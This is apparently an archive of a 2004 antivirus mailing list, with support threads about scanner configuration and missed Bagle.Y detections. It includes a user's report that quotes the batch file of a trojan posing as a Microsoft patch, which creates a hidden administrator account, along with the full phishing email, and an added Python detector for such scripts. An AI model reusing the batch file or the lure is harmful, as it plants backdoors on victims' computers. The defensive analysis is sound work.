Re: [Declude.Virus] Keep sending out viruses notice for forging virus?
> Do I need to change all the similar lines to just 1 space or tab, like BANEXT EZIP? Will it work if there is more than 1 space?

Only the commands in the .eml files have the one space/tab limitation.

-Scott
---
Declude JunkMail: The advanced anti-spam solution for IMail mailservers since 2000.
Declude Virus: Ultra reliable virus detection and the leader in mailserver vulnerability detection.
Find out what you've been missing: Ask for a free 30-day evaluation.
---
[This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)]
---
This E-mail came from the Declude.Virus mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type "unsubscribe Declude.Virus". The archives can be found at http://www.mail-archive.com.

RE: [Declude.Virus] 8.11 possible problem
> Nothing looks wrong, I've just had that one instance of a .cpl making it through (and it was, of course, virus-laden).

Do you have the Declude Virus log file entries for the E-mail?

-Scott

RE: [Declude.Virus] 8.11 possible problem
> Unfortunately, no. I'm not able to identify which e-mail it was - McAfee or human error (I actually believe McAfee) blew the e-mail away.

In that case, I can't think of anything that you can do to track down what happened. Without the E-mail that got through or log file entries to work with, I can come up with some possible scenarios as to what happened, but it probably wouldn't even be possible to prove or disprove any of them.

-Scott

[Declude.Virus] Bagle.Y In ZIP File Got By?
Bagle.Y in a ZIP file got by our Declude scanner. Should this be caught by Declude?

Dan

Re: [Declude.Virus] Bagle.Y In ZIP File Got By?
> Bagle.Y in a ZIP file got by our Declude scanner. Should this be caught by Declude?

Every virus should be caught by Declude. What does your Declude Virus log file say for the E-mail? Are your virus definitions up-to-date? Are you running the latest beta of Declude Virus, with a line BANEXT EZIP in the \IMail\Declude\virus.cfg file?

-Scott

Re: [Declude.Virus] Bagle.Y In ZIP File Got By?
On 5/4/2004 11:00 AM, R. Scott Perry wrote:
>> Bagle.Y in a ZIP file got by our Declude scanner. Should this be caught by Declude?
> Every virus should be caught by Declude. What does your Declude Virus log file say for the E-mail? Are your virus definitions up-to-date? Are you running the latest beta of Declude Virus, with a line BANEXT EZIP in the \IMail\Declude\virus.cfg file?

I wasn't aware of the BANEXT EZIP option. Thanks for pointing that out.

Dan

[AUTOMATED NOTE: Your mail server [208.44.131.161] is missing a reverse DNS entry. All Internet hosts are required to have a reverse DNS entry. The missing reverse DNS entry will cause your mail to be treated as spam on some servers, such as AOL.]

[Declude.Virus] New virus?
I've just received a fake Microsoft email with a 744kb patch attached. It was not detected by my Norton, not by F-Prot, nor AVG or McAfee. In this patch it has a start batch file which does this:

    @echo off
    copy _sys1.cab %windir%\system32\raddrv.dll
    cls
    copy _user1.cab %windir%\system32\admdll.dll
    cls
    copy data1.cab %windir%\system32\cmdll32.exe
    cls
    copy layout.bin %windir%\system32\settings.reg
    cls
    copy MSCOMCTL.OCX %windir%\system32\MSCOMCTL.OCX
    cls
    regedit.exe /s %windir%\system32\settings.reg
    net user system_support {u-r-fucked} /ADD /ACTIVE:YES /EXPIRES:NEVER /TIMES:ALL
    net localgroup Administrators system_support /ADD
    cls
    UPDATE.EXE
    cls
    exit

I've attached the email without the virus so you can have a look at it.

Adrian

---BeginMessage---
Critical announcements
An important security announcement to all Microsoft Windows users!

Critical Security Update for Microsoft Windows (KB2856093)

A critical security issue has been identified that could allow an attacker to compromise a computer running Windows and gain control over your system and files. This issue has been discussed in KB2856093 Microsoft Knowledge Base. Microsoft Security Response Team recommends to protect your computer by installing this update from Microsoft.

Patch Information:
Type: Critical Security Update
Vulnerability: High
Vendor notified: April 29, 2004
Update Release Date: May 02, 2004
Download Size: 744 KB, 2 minutes @ 28.8 modem
File Name: WINDOWS-KB2856093-X86-ENU.EXE
Affected Versions: Microsoft Windows 95/98/ME/NT/2000/XP/2003

To install this update, follow these instructions:
1 Download WINDOWS-KB2856093-X86-ENU.EXE file from Windows Update site or open an attached file.
2 Launch WINDOWS-KB2856093-X86-ENU.EXE and follow on-screen instructions.
3 After you install this item, you may have to restart your computer, to ensure a full protection.

©2004 Microsoft Corporation. All rights reserved. Terms of Use | Privacy Statement
---End Message---
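
An added example, not part of the original post and not Declude's code: a static triage of the start batch file quoted above, flagging the behaviours that mark it as a backdoor installer rather than a patch even when no scanner signature exists yet. The `triage` function, the rule names and the sample (password replaced by a placeholder, `cls` lines dropped) are constructed for illustration.

```python
import re

# Constructed sample: the start batch file quoted in the post above, with the
# password replaced by a placeholder and the `cls` lines dropped.
SAMPLE_BATCH = r"""@echo off
copy _sys1.cab %windir%\system32\raddrv.dll
copy _user1.cab %windir%\system32\admdll.dll
copy data1.cab %windir%\system32\cmdll32.exe
copy layout.bin %windir%\system32\settings.reg
copy MSCOMCTL.OCX %windir%\system32\MSCOMCTL.OCX
regedit.exe /s %windir%\system32\settings.reg
net user system_support REDACTED /ADD /ACTIVE:YES /EXPIRES:NEVER /TIMES:ALL
net localgroup Administrators system_support /ADD
UPDATE.EXE
exit
"""

# Hypothetical rule set: extensions Windows will load, run or import.
EXEC_EXT = {".exe", ".dll", ".ocx", ".reg", ".bat", ".cmd", ".scr"}
SYSDIR = re.compile(r"%(windir|systemroot)%\\system32\\", re.I)

def ext(path):
    """Lower-cased file extension of a path, or '' if it has none."""
    m = re.search(r"(\.[A-Za-z0-9]+)$", path)
    return m.group(1).lower() if m else ""

def triage(script):
    """Return (line_no, finding) pairs for behaviours a patch has no reason to show."""
    findings = []
    for no, line in enumerate(script.splitlines(), 1):
        tok = line.split()
        low = [t.lower() for t in tok]
        if not tok:
            continue
        if low[0] == "copy" and len(tok) >= 3 and SYSDIR.search(tok[2]):
            # A data file (.cab, .bin) renamed to a loadable type while being dropped
            if ext(tok[1]) != ext(tok[2]) and ext(tok[2]) in EXEC_EXT:
                findings.append((no, "disguised-file-to-system32"))
        elif low[0] in ("regedit", "regedit.exe") and "/s" in low[1:]:
            findings.append((no, "silent-registry-import"))
        elif low[0] in ("net", "net.exe") and len(tok) >= 3 and "/add" in low:
            if low[1] == "user":
                findings.append((no, "local-account-created"))
            elif low[1] == "localgroup" and low[2] == "administrators":
                findings.append((no, "account-added-to-administrators"))
    return findings
```

Run over the sample, the same-extension `MSCOMCTL.OCX` copy is not flagged, while the four renamed drops, the silent registry import and the two `net` commands are.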